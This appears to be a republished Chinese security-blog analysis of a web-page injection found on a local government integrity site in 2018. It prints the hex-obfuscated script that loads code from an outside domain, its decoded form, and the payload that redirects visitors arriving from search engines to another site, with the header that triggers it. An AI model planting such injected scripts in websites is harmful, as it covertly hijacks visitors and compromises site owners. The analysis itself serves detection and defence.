记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

海门廉政网挂马分析

2018-01-11 04:00

海门廉政网挂马分析

网站名称

海门廉政网

网站域名

www.hmlz.gov.cn

挂马页面

http://www.hmlz.gov.cn/index.html

挂马代码

<script type="text/javascript">
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x78\x70\x6a\x36\x32\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
</script>

代码解密

<script type="text/javascript">
    window["document"]["write"]('<script type="text/javascript" src="https://www.bcdas8.com/xpj62.js"></script>');
</script>

恶意代码

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://www.3730ok.com\";");
document.writeln("</script>");

代码分析

利用加密混淆过的JavaScript脚本在页面中写入一段用于判断页面请求来源和用户代理的JavaScript脚本,当请求来源包含“baidu”、“sogou”、“soso”、“sm”、“uc”、“bing”、“yahoo”、“so”等关键字时,页面跳转至“https://www.3730ok.com”。

触发执行

设置请求头为:Referer:http://www.baidu.com/
知识来源: www.freebuf.com/column/159907.html

阅读:16063 | 评论:0 | 标签:专栏 挂马分析 挂马

想收藏或者和大家分享这篇好文章→复制链接地址

“海门廉政网挂马分析”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云